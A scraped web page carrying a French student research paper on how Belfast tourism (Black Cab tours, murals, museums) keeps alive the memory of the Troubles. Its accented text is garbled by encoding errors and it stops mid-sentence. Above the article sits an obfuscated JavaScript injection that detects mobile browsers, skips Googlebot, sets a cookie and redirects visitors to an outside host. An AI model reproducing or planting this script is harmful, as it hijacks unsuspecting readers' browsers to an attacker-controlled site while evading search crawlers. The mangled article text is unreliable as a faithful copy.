var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Le rA?le de la��offre touristique belfastoise dans la perpA�tuation de la mA�moire des « Troubles »

ParA�Emilie Guibert et Valentina Ferreira GutiA�rrez

1. Introduction

1.1A� Contexte

La��Irlande du Nord fut le thA�A?tre da��intenses conflits entre le 5 octobre 1968 – date de la Civil Right March A� Derry – et le 10 avril 1998 a�� date qui marque la��Accord du Vendredi Saint[1]. Ces derniers ont opposA� les rA�publicains, militant pour le ralliement A� la��Irlande, et les loyalistes, fidA?les A� la couronne da��Angleterre. La plupart des affrontements civils se sont dA�roulA�s A� Belfast, ville considA�rA�e comme A�tant la A� miniature urbaine du conflit national A� (Ballif, 2012, p.116). Ce contexte da��affrontements na��A�tait pas propice au dA�veloppement touristique de la capitale qui pA?tit durant de longues annA�es des images de violence et de sA�grA�gation diffusA�es A� travers le monde. En effet, dA?s 1969, on assiste A� la construction da��un mur, dit A�A�de la paixA�A�, sA�parant physiquement les communautA�s catholiques et protestantes. La pA�riode des Troubles contribua au dA�veloppement da��un imaginaire touristique associant Belfast A� la��instabilitA� et A� la��incomprA�hension culturelle (Morand, 2009), ce qui explique le fait que la��Irlande du Nord na��ait pas A�tA� privilA�giA�e en tant que destination touristique durant prA?s de trente ans. Cependant, la��accord de paix de 1998 marque le dA�but de la��expansion da��un nouveau tourisme en Irlande du Nord. Depuis, les compagnies aA�riennes desservent A� nouveau la capitale rA�gionale et le nombre de visiteurs serait passA� de 1.6 millions en 1999 A� 6.8 millions en 2006 (Morand, 2009, p.39). Les moteurs du dA�veloppement de ce nouveau tourisme sont multiples: da��une part, le gouvernement nord-irlandais sa��est servi de cet instrument afin de diversifier ses ressources A�conomiques (Legrand, 2002); da��autre part, cette ouverture au tourisme a contribuA� au renouvellement de la��image de la ville (Ballif, 2012). Dans le cadre de cette politique touristique, des espaces urbains et les traces du conflit sont A� mis en tourisme A� afin de susciter la��intA�rA?t des touristes tout en perpA�tuant la mA�moire de ce dernier.

Aujourda��hui, Belfast fait partie des destinations nouvellement A� rA�-ouvertes A� au tourisme (Morand, 2009) : les traces matA�rielles des Troubles ont A�tA� patrimonialisA�es et sont exploitA�es en tant que ressources touristiques par des acteurs privA�s et publics (Naef, 2013). Ce patrimoine qui comprend les murals, symboles de la lutte entre deux communautA�s (Ballif, 2014) et tA�moignages de la guerre civile, sont trA?s prisA�s par les visiteurs. Ceux-ci sont mentionnA�s dans les guides touristiques comme A�tant des A�hauts-lieux de la ville A� (Ballif, 2012, p.118), de par leur reprA�sentativitA� de la��histoire de Belfast. Dans le cadre de notre travail, nous les considA�rerons comme A�tant des supports de mA�moire, car les discours les accompagnant sont souvent porteurs da��expA�riences personnelles. On le verra par la suite, les acteurs touristiques ont tendance A� mettre en scA?ne leur vA�cu lorsqua��ils font visiter certains monuments ou lieux historiques. Mis A� part les murals, il existe da��autres supports de mA�moire dont la nature varie.

Il existe da��une part des symboles matA�riels parmi lesquels figurent des musA�es, A�des mA�moriels ou des quartiers ayant A�tA� touchA�s par les affrontements, comme ceux de Shankill et Falls. Da��autre part, on retrouve aussi des supports de mA�moire immatA�riels et symboliques tels que des tA�moignages oraux. Cependant, malgrA� cette diversitA� de supports, les murals constituent, au vu de ce que nous avons pu observer lors de notre sA�jour, la��A�lA�ment le plus rA�current proposA� par la��offre touristique orientA�e vers la thA�matique des Troubles. Enfin, le fait que les touristes prA?tent une attention grandissante A� la��A�gard de ces sites emblA�matiques du conflit reflA?te, selon nous, leur dA�sir de participer A� la perpA�tuation de la mA�moire de ce dernier (Morand, 2009, p. 45).

1.2 Les concepts relatifs au tourisme mA�moriel

Mener une A�tude dans ce contexte implique de dA�finir au prA�alable certains concepts. Nous tirerons de la littA�rature certaines dA�finitions afin de poser un cadre thA�orique qui nous servira de base pour notre dA�veloppement. Nous dA�finirons donc de maniA?re prA�cise ce que nous entendons lorsque nous mentionnons les notions de mA�moire, lieu de mA�moire, mise en tourisme et tourisme mA�moriel.

Dans sa thA?se, Anne-CA�line Morand reprend les dires de Pierre Morand qui stipule que A�A�(a��) la mA�moire est la vie, toujours portA�e par des groupes vivants et A� ce titre, elle est en A�volution permanente, ouverte A� la dialectique du souvenir et de la��amnA�sie inconsciente de ses dA�formations successives, vulnA�rable A� toutes les utilisations et manipulations, susceptible de longues latences et de soudaines revitalisations.A�A� (Morand, 2009, p.9). La mA�moire sa��oppose donc A� la��histoire dans le sens oA? elle fait rA�fA�rence A� des faits dont il existe encore des tA�moins vivants, crA�ant de ce fait un lien entre les temps chronologiques du prA�sent et du passA�. La mA�moire suppose donc qua��une personne physique soit porteuse de cette derniA?re. Par ailleurs, la mA�moire est sujette A� des transformations au fil de sa transmission contrairement A� la��histoire qui est une reconstruction incomplA?te mais immuable de ce qui na��est plus (Morand, 2009, p.9).

Il existe un lien entre mA�moire et espace, car la mA�moire tend A� sa��incarner dans des lieux ou des reprA�sentations de lieux (Petitier, 1989). De lA� dA�coule la notion de lieu de mA�moire. Selon Jean-Didier Urbain, un lieu de mA�moire na��est pas une destination comme les autres. Elle na��existe pas en soi, mais par un regard spA�cifique. A�Celui qui se souvient transforme un simple lieu en rA�ceptacle da��un passA� toujours vivant dans les mentalitA�s (Urbain, 2003). Le lieu de mA�moire peut A?tre topographique, monumental ou symbolique (Petitier, 1989) mais reste indissociable de celui qui le pense. Tout comme dans la notion de mA�moire explicitA�e ci-dessus, on retrouve, dans la dA�finition du lieu de mA�moire, le lien existant entre ce qui est passA� et ce qui est prA�sent.

Ces lieux peuvent, selon la��expression employA�e par la��Equipe MIT, A?tre mis en tourisme (Equipe MIT, 2000). Cette mise en tourisme consiste en la construction da��une dA�sirabilitA� de ces lieux potentiellement associA�s A� la violence, A� la mort, au deuil, et au sacrifice (Hertzog, 2012). Dans le cas de notre A�tude, les lieux de mA�moire sont construits par les acteurs touristiques comme destinations A�sA�duisantes pour le visiteur. Ce processus tend A� transmettre un message contribuant A� la construction da��une image de la ville censA�e susciter la��intA�rA?t du touriste (Hertzog, 2012).

Enfin, ces lieux de mA�moire sont mis en tourisme dans le cadre da��un tourisme mA�moriel. La dA�finition de ce type particulier de tourisme mentionnA�e par Jean-Didier Urbain est la suivante: A�A la��intA�rieur da��un territoire, il est outil de consolidation da��une unitA� culturelle, da��une construction identitaire, da��une formation des peuples. A la��extA�rieur, pour le visiteur A� la culture da��accueil, il est vecteur de diffusion da��une image, da��une identitA� culturelle A� (Urbain, 2003, p.6). Le tourisme mA�moriel suppose donc un individu porteur da��une mA�moire, qua��il transmettrait A� des fins de crA�ation identitaire et de lutte contre la��oubli. Ca��est un tourisme du passA� sans A?tre un tourisme passA�iste ou nostalgique qui reviendrait A� un simple A� retour aux origines A� (Urbain, A�2003). Il permet de perpA�tuer la mA�moire des A�vA�nements passA�s en les rapatriant dans le prA�sent et en les transmettant A� autrui. Vecteur de conscientisation historique de celui qui en fait la��expA�rience, ce type de tourisme contribue A� la��acceptation du passA� et participe indirectement au maintien de la paix sociale en crA�ant une certaine da��intercomprA�hension culturelle.

Notre cadre thA�orique A�tant dA�fini, nous allons pouvoir passer A� la prA�sentation des enjeux sous-jacents A� notre thA�matique, ainsi qua��A� la problA�matique qua��elle soulA?ve. Au fil de ce travail, nous reviendrons souvent sur ces diffA�rentes dA�finitions.

1.3 ProblA�matique et enjeux

Ca��est dans le cadre de la mise en tourisme da��A�lA�ments relatifs aux Troubles que notre dA�marche sa��inscrit. Dans une ville qui a souffert de violents affrontements, les murals, les mA�moriels et certains quartiers constituent des preuves matA�rielles des A�vA�nements passA�s. Il sera question ici de comprendre comment le tourisme belfastois cherche A� faire connaA�tre la��histoire des Troubles aux visiteurs. Notre travail consistera en une analyse de la��offre touristique A� travers la perspective du tourisme mA�moriel, ou tourisme de mA�moire. Comme mentionnA� ci-dessus, ce type de tourisme A� vocation pA�dagogique fait rA�fA�rence A� un phA�nomA?ne ancien ayant dA�butA� avec la PremiA?re Guerre Mondiale, et qui a contribuA� dA?s les annA�es 1990 A� la production da��un imaginaire touristique (Hertzog, 2012). Dans ce contexte, les traces de guerre deviennent une ressource mobilisA�e par les acteurs de la��offre touristique. Nous analyserons donc comment ces derniers font appel A� la mA�moire du conflit ayant sA�vi entre 1969 et 1998 en A�tudiant la mise en tourisme des murals et des autres A�lA�ments porteurs de mA�moire.

A� travers notre approche mA�morielle de la��offre touristique belfastoise, nous pouvons voir A�merger deux enjeux. PremiA?rement, on constate que les discours da��anciens prisonniers politiques et da��autres personnes ayant vA�cu ou participA� au conflit sont mobilisA�s par la��industrie touristique. Da��une part, nous pouvons penser que cette mise en scA?ne sa��inscrit dans une logique de recherche de profit, car les touristes ont tendance A� A?tre attirA�s par les anecdotes personnelles. De ce fait, cette tendance peut A?tre instrumentalisA�e A� des fins A�conomiques. Da��autre part, la mise en scA?ne de discours peut A�galement rA�pondre A� la volontA� de transmettre A� autrui la mA�moire des A�vA�nements passA�s. Dans le cadre de notre thA�matique, nous allons plutA?t nous pencher sur ce second aspect car il peut A?tre mA� par un enjeu de sensibilisation. Lorsque nous avons rencontrA� un conducteur de Black Cab, nous lui avons posA� des questions sur les motivations qui la��ont poussA� A� devenir guide touristique. Ce dernier nous a alors rA�pondu qua��il A�tait nA�cessaire que les individus soient conscients de la gravitA� de la situation ayant sA�vi A� Belfast. De ce fait, il est selon lui primordial de sensibiliser le visiteur par le biais de la transmission da��expA�rience personnelle. De maniA?re gA�nA�rale, il sa��agit donc de faire comprendre aux touristes pourquoi les A�vA?nements se sont dA�roulA�s ainsi, en explicitant les raisons qui ont poussA� les acteurs prA�sents A� la��A�poque A� agir de la sorte. Plus qua��une justification de leurs actes, ces expA�riences personnelles sont mobilisA�es dans le but de sensibiliser les touristes A� la situation locale afin que ces derniers assimilent au mieux la mA�moire du conflit.

DeuxiA?mement, nous avons dA�celA� un enjeu pA�dagogique lors de notre analyse de la��offre touristique. On peut considA�rer que les acteurs de ce milieu ont pour but da��instruire le visiteur dans le cadre da��un tourisme mA�moriel. Outre le fait da��inculquer certaines connaissances historiques, une des raisons de la vocation pA�dagogique de ce type de tourisme peut A?tre, selon nous, de promouvoir la��intercomprA�hension culturelle. En effet, nous pensons que le fait de transmettre la��histoire du conflit A� autrui par le biais du tourisme mA�moriel peut engendrer plus de rA�ceptivitA�, permettant une meilleure assimilation des A�lA�ments historico-culturels locaux. Ce tourisme pA�dagogique conduit donc celui qui en fait la��expA�rience A� adopter une attitude plus critique envers la situation belfastoise et envers lui-mA?me, A� condition que celui-ci effectue un travail de distanciation et ne considA?re pas chaque rA�cit personnel comme A�tant la seule et unique version des A�vA�nements passA�s.

1.4 Question de recherche et hypothA?ses

AprA?s avoir A�tabli le contexte ainsi que les enjeux de notre thA�matique, nous allons dA�finir notre question de recherche. On observe dans la��offre touristique de la capitale rA�gionale une volontA� de mettre en avant son identitA� ainsi que la maniA?re dont la population a vA�cu le conflit. Ce processus sa��opA?re A� travers la prA�sentation de la mA�moire belfastoise aux touristes (Morand, 2009, p.56). La��offre touristique actuelle diffA?re beaucoup de celle qui a directement fait suite A� la pA�riode des Troubles. Peu de temps aprA?s la��Accord de Paix de 1998, il sa��agissait de faire oublier ce sombre A�pisode a�� ca��est da��ailleurs ce que certains prestataires publics continuent de faire, pour des raisons de neutralitA�, ou dans la��espoir de donner une meilleure image de la ville.

Cependant, la mA�moire du conflit est aujourda��hui mise en avant par divers prestataires, notamment par des agences touristiques privA�es. Ces derniers proposent diffA�rents types de circuits, appelA�s Political Tours (Morand, 2009, p.63). Ca��est dans le cadre de la mise en scA?ne de la mA�moire par la��offre touristique que rA�side tout la��intA�rA?t de notre travail. La question A� laquelle nous allons tenter de rA�pondre sera donc la suivante:

Comment la��offre touristique belfastoise inclut-elle le touriste A� la production de mA�moire? Comment la��espace est mobilisA� par la��offre touristique belfastoise dans le cadre de la territorialisation de la mA�moire?

Trois hypothA?ses dA�coulent de ces deux questionnements. Celles-ci nous aideront A� orienter nos recherches.

H1: Les acteurs de la��offre touristique mettent en scA?ne des rA�cits personnels dans le cadre de visites interactives qui stimulent la co-construction de mA�moire.

A travers le concept de A�A�rA�cits personnelsA�A�, nous entendons toutes les expA�riences vA�cues et les tA�moignages du conflit mis en avant par la��offre touristique. De maniA?re gA�nA�rale, nous nous attendons A� faire la��expA�rience de visites touristiques interactives, durant lesquelles notre opinion et notre ressenti sont sollicitA�s. En ce qui concerne les prospectus touristiques des agences locales, nous pensons y retrouver des expressions faisant allusion A� un retour dans le temps, ou nous proposant une certaine immersion dans la��A�poque des Troubles, ce qui aurait pour but la stimulation de la co-construction de mA�moire.

Lors des Political Tours, nous nous attendons A� A?tre plongA�es dans le vA�cu trA?s personnel des guides touristiques ayant participA� A� la pA�riode des Troubles. Ainsi, cela nous aidera A� nous rapprocher de ces derniers et A� dA�velopper une certaine empathie envers eux. Ce processus conduit A� un glissement entre la position de chercheur et celle de touriste, ce qui peut potentiellement biaiser la validitA� de nos rA�sultats. Cependant, nous effectuerons un travail de distanciation et da��objectivation lors du traitement de notre matA�riau da��analyse, bien que la��objectivitA� totale constitue un objectif inatteignable.

H2: La��offre touristique met en place des circuits pA�dagogiques qui amA?nent le visiteur A� participer activement A� la perpA�tuation de la mA�moire du conflit.

Lors des visites touristiques, nous nous attendons A� A?tre instruites sur la��histoire des Troubles. De ce fait, nous espA�rons qua��A� la fin de notre sA�jour A� Belfast, nous disposerons de tous les A�lA�ments nA�cessaires pour nous forger notre propre opinion A� la��A�gard de cette pA�riode. Le fait da��avoir assimilA� en profondeur les A�vA�nements ayant sA�vi durant les Troubles nous permettra peut-A?tre da��A?tre capables de transmettre ce savoir acquis A� autrui, ce qui fera de nous des personnes actives dans la perpA�tuation de la mA�moire de la��histoire belfastoise.

H3: Il existe un processus de territorialisation de la mA�moire en certains lieux spA�cifiques.

Finalement avec cette derniA?re hypothA?se, nous nous attendons A� voir une rA�partition et/ou une territorialisation de la mA�moire en certains lieux ou secteurs spA�cifique de la ville. La territorialisation de la mA�moire conduit la��individu A� associer un souvenir A� un certain lieu, elle peut donc A?tre exploitA�e A� des fins touristiques.

2. MA�thodologie

Nous allons A� prA�sent tenter de rA�pondre A� nos questions de recherche par le biais de la vA�rification de nos hypothA?ses sur le terrain. Pour ce faire, nous analyserons les modalitA�s de la��offre touristique belfastoise qui tendent A� inclure le visiteur A� la production mA�morielle.

Nos expA�riences touristiques A� Belfast furent nombreuses et nous avons sA�lectionnA� celles qui avaient trait A� notre thA�matique, A� savoir : la visite guidA�e de la Linen Library et des archives du conflit, un City Tour en bus proposA� par la compagnie privA�e Belfast City Sightseeing open top Bus tour, la dA�couverte des quartiers de Falls et Shankill en Black Cab, la visite du Centre Culturel GaA�lique, et enfin les visites de la��Ulster Museum ainsi que celle du Loyalist Museum a�� Andy Tyrie Interpretive Centre accompagnA�e da��un tour dans le quartier de East Belfast. Parmi les acteurs touristiques que nous avons analysA�s, certains sont donc issus de compagnies publiques, et da��autres de compagnies privA�es. Comme nous na��avons pas toujours A�tA� en mesure de savoir si les acteurs touristiques rencontrA�s A�taient issus du domaine public ou du privA�, nous avons dA�cidA� de ne pas attacher trop da��importance A� cette distinction.

Aussi, nous sommes conscientes que cette liste est non-exhaustive et que notre regard sur ces visites a potentiellement A�tA� biaisA� par nos objectifs de recherche. Notre statut de chercheuses nous inclut dans une certaine catA�gorie de touriste, A� savoir, celle des individus intA�ressA�s par la dimension pA�dagogique et la dA�marche scientifique dans la visite da��un lieu (Crahay, 2014). De ce fait, nous nous trouvons dans une position intermA�diaire entre celle du touriste et celle du chercheur scientifique. Cette situation na��est pas sans consA�quence.

Da��un cA?tA�, nous aurons tendance A� nous A�loigner de la position de touriste, car nous aurons peut-A?tre un point de vue plus critique que ces derniers. En effet, contrairement aux touristes en recherche de divertissement, nous vivrons ces expA�riences en restant focalisA�es sur nos objectifs de recherche.

De la��autre, nous na��adopterons pas totalement la posture da��un chercheur scientifique du fait que nous baserons notre analyse sur notre ressenti. De ce fait, nous serons nous-mA?mes objets de notre recherche, ce qui pourrait altA�rer la validitA� de nos conclusions.

Dans le cadre de nos deux premiA?res hypothA?ses, le fait da��A?tre A� la fois chercheuses et objet de recherche biaisera la��interprA�tation de nos rA�sultats, et nous posera problA?me lorsqua��il sa��agira de vA�rifier la��interactivitA� des visites et leur aspect pA�dagogique. En effet, afin de neutraliser la��effet de ce glissement, il nous aurait fallu interroger da��autres touristes ayant participA� aux mA?mes visites, et A�ventuellement effectuer une observation participante afin que notre matA�riel da��analyse soit plus reprA�sentatif. Malheureusement, nous na��avons pas A�tA� en mesure de mener A� bien ces dA�marches, faute de temps et de moyens.

Plus concrA?tement, afin de rA�pondre A� nos questions de recherche, nous avons A�tA� trA?s attentives A� la faA�on dont les murals et les autres A�lA�ments ayant trait au conflit sont prA�sentA�s lors des visites. De ce fait, nous avons analysA� comment les agences proposent de nous A�A�faire visiterA�A� la ville. Ensuite, nous avons rA�coltA� un maximum de matA�riel publicitaire A� analyser, comme des prospectus et des affiches touristiques. Nous avons par ailleurs demandA� conseil A� un office de tourisme ainsi qua��A� la rA�ception de notre auberge, dans le but de voir le type de visites proposA�. En analysant ces documents, nous avons tentA� de repA�rer des slogans-types invitant le visiteur A� sa��immiscer dans la��atmosphA?re des Troubles.

Enfin, un carnet de terrain nous a A�tA� essentiel. Lors des visites guidA�es, nous avons relevA� les A�lA�ments qui A�taient pour nous susceptibles da��inclure le visiteur A� la perpA�tuation de la mA�moire du conflit. En effet, au niveau de la��offre touristique, les visites ayant pour thA�matique le conflit nord-irlandais et tendant A� inclure le visiteur A� la production de mA�moire se dA�clinent en plusieurs modalitA�s, notamment la mise en scA?ne de rA�cits personnels et la valorisation de circuits pA�dagogiques. Par exemple, les Black Cabs proposent au visiteur de faire un tour de la ville. Souvent, le chauffeur est un ancien prisonnier politique qui raconte A�les A�vA�nements passA�s selon son appartenance religieuse, ce qui fait que le touriste prendra connaissance de la ville A� travers les yeux da��un protestant ou da��un catholique (Lisle, 2006). La��intA�rA?t de ce genre de visite sera de voir en quoi ce processus nous implique dans la co-construction de mA�moire.

3. ElA�ments da��analyse

3.1 Deux modalitA�s touristiques fonctionnant dans un cadre interactif

3.1.1 La mise en scA?ne de rA�cits personnels

a) Un tourisme informatif et historique

Parmi nos diverses expA�riences, deux da��entre elles ne nous permettent pas da��affirmer la��hypothA?se selon laquelle la��offre touristique met en scA?ne des rA�cits personnels dans le cadre du tourisme mA�moriel. La premiA?re visite durant laquelle nous na��avons relevA� que trA?s peu da��A�lA�ments relatifs aux Troubles est celle du City Hall. Aucun rA�cit personnel na��a A�tA� mis en avant par notre guide qui nous a prA�sentA� une vision relativement institutionnelle de la��histoire de la ville. La seconde visite durant laquelle la��interaction et la mise en scA?ne de rA�cits personnels na��est pas de mise est celle proposA�e par les Belfast City Sightseeing open top Bus tour : lors de cette visite, les informations A�taient transmises de maniA?re impersonnelle. Cette impression peut A?tre due au fait que cette compagnie, bien que privA�e, possA?de une licence du dA�partement de la��environnement qui les oblige A� rester neutre. Proposer des rA�cits personnels pourrait paraA�tre trop partial pour ce genre de visite. Selon nous, ces deux visites ne sa��inscrivent pas dans le cadre da��un tourisme mA�moriel mais plutA?t dans celui da��un A� tourisme informatif A� ou A� historique A�.

b) Des rA�cits personnels dA�guisA�s?

Nos impressions sont plus mitigA�es quant A� la visite du Loyalist Museum et du quartier de East Belfast: nos deux guides na��ont pas mis leurs propres expA�riences en avant et na��ont que trA?s peu parlA� da��eux. Cependant, nous avons senti dans leur discours que ces derniers ont A�tA� impliquA�s da��une maniA?re ou da��une autre dans le conflit, car ils utilisaient le pronom personnel A� nous A� lorsqua��ils nous prA�sentaient les actions armA�es perpA�trA�es par les groupes protestants (UFF, UDA, UYM)[2]. Aussi, la tension A�tait palpable lorsqua��ils nous parlaient des victimes loyalistes et nous prA�sentaient les nombreux mA�moriels protestants. MA?me si cette visite na��a pas A�tA� des plus interactive et que nous na��avons dA�celA�, a priori, aucun rA�cit personnel, sa neutralitA� na��a pas A�tA� totale: selon nous, le fait de prA�senter les forces protestantes comme A�tant de A� bons justiciers A�, peut avoir pour finalitA� de nous rallier A� leur cause. Nous pouvons donc considA�rer cela comme une invitation A� la perpA�tuation de A�A�leurA�A� mA�moire du conflit. En effet, nos deux guides nous ont expliquA� avoir crA�A� ce musA�e en rA�action au succA?s des Black Cabs, majoritairement catholiques, afin de pouvoir, eux aussi, perpA�trer leur version de la��histoire.

Enfin, trois visites nous permettent de vA�rifier la��hypothA?se selon laquelle la��offre touristique met en place des rA�cits personnels dans le but de perpA�tuer la mA�moire du conflit.

c) Un rA�el partage da��expA�riences de vie ?

Dans un premier temps, la partie archive de la Linen Library fut trA?s intA�ressante. Au dA�but, notre guide sa��est attardA� sur un grand livre datant de 1969 qui recense la population de Belfast de la��A�poque ainsi que les rues prA�sentes A� cette date. Ce dernier lui rappelle son enfance, car certains endroits qua��il apprA�ciait A�tant enfant ont A�tA� dA�truits durant les Troubles. En tant que support de mA�moire, ce registre dans lequel figure son grand-pA?re confA?re A� notre guide le statut de mA�diateur : par le biais de ce dernier, il nous a transmis A� la fois la mA�moire de son grand-pA?re, la sienne, mais aussi celle de la gA�ographie passA�e de la ville. Ensuite, des rA�cits personnels ont A�tA� mis en scA?ne par le biais de divers supports: par exemple, on trouve dans ce musA�e des lettres A�crites, durant le conflit, par da��anciens prisonniers en grA?ve de la faim sur du papier toilette ou du papier A� cigarette. Ces derniers, ayant la��interdiction de communiquer avec la��extA�rieur, sa��en servaient pour donner des nouvelles A� leur famille par la��intermA�diaire des prA?tres. Cette fonction a aujourda��hui laissA� la place A� celle de la transmission de mA�moire : en tant que touriste, nous avons eu la��opportunitA� de lire ces rA�cits personnels, et donc de sa��imprA�gner, la��espace da��un instant, du souvenir de quelques individus. Cependant, notre rA?le dans la co-construction et la perpA�tuation de leur mA�moire se limite A� nous remA�morer ces A�crits, car notre capacitA� de retransmission de cette mA�moire est limitA�e, entre autres par la��interdiction de les photographier.

Ensuite, bien qua��une grande partie de la��Ulster Museum relative aux Troubles soit constituA�e da��informations objectives et de faits historiques irrA�futables prA�sentA�s de maniA?re unilatA�rale, nous avons dA�couvert grA?ce A� la��un de nos camarade une petite section portant sur des tA�moignages audio du conflit. Cette partie du musA�e, regrettablement peu mise en valeur, nous a permis de nous plonger dans le vA�cu des individus. La partie BBC Legacy de cette plateforme fut trA?s intA�ressante dans le cadre de notre travail, car la prA�sentation des rA�cits personnels y est faite da��une maniA?re telle qua��elle est accessible A� tout un chacun : en effet, il na��est pas nA�cessaire da��avoir certaines connaissances scientifiques ou historiques prA�alables pour A?tre touchA� par ces commentaires et la mA�moire du narrateur nous parvient mA?me si ce dernier ne se trouve pas en face de nous. Par exemple, parmi les rA�cits partisans figure la��histoire da��un homme loyaliste, dont la famille A�tait trA?s impliquA�e dans le conflit. Ce dernier conte les raisons de son attitude critique envers les actes de sa famille et nous explique qua��il a dA�cidA� de sa��en A�carter avec sa sA�ur.

Un autre tA�moignage que nous avons entendu est celui da��une femme catholique racontant son enfance perdue, sa mA?re ayant A�tA� assassinA�e durant les Troubles lorsqua��elle avait neuf ans. Da��autres rA�cits purement personnels qui ne mentionnent pas la position de la��individu dans le conflit sont proposA�s, comme celui da��une femme touchA�e par balle A� la jambe alors qua��elle A�tait enceinte de trois mois. Cette derniA?re nous fait part de ses prA�occupations et angoisses du moment en nous affirmant que mA?me si elle et son enfant ont survA�cu, ce traumatisme la hantera A� vie.

Ces tA�moignages ont eu pour effet de nous plonger directement dans la��atmosphA?re du conflit. MA?me si cette expA�rience na��A�tait pas interactive, nous sommes aujourda��hui porteuses de la mA�moire de ces personnes.

Enfin, une derniA?re expA�rience qui nous permet da��affirmer notre premiA?re hypothA?se est celle de la visite des quartiers de Shankill et Falls en Black Cab. Une citation issue du flyer de la compagnie TaxiTrax illustre bien la��idA�e de transmission de mA�moire par le biais da��expA�riences personnelles: A�A�All of our drivers are highly experienced with a wealth of personal knowledge, guaranteeing your trip to be something you will always remember. (a��) [A]s your driver shares a little personal anecdote, you can be sure that you will have seen the real Belfast (a��)A�A�. En effet, au vu de notre expA�rience dans ces taxis nous pouvons affirmer la vA�racitA� de cette citation : premiA?rement, cette visite nous a vA�ritablement permis de nous projeter dans la pA�riode des Troubles, car la mise en rA�cit y est trA?s valorisA�e. Tout au long de cette escapade en voiture, notre chauffeur nous faisait part des histoires qua��il avait vA�cu durant le conflit. Par exemple, lorsque nous lisions les noms des dA�funts mentionnA�s sur les mA�moriels, il nous avouait que certains da��entre eux faisaient partie de ses amis. Aussi, ayant A�tA� lui-mA?me prisonnier politique, cela rendait son discours da��autant plus poignant et nous avons vraiment A�tA� touchA�es par ce qua��il nous a confiA�. Lorsque nous lui avons demandA� pourquoi il avait voulu exercer cette profession, ce dernier nous a simplement rA�pondu : A�A�I want to put a face on the situation and humanize the warA�A�. Suite A� cela, il nous a affirmA� qua��il prA�fA�rait raconter lui-mA?me sa perception du conflit plutA?t qua��elle soit transmise par le biais da��un livre da��histoire, car les gens sont plus 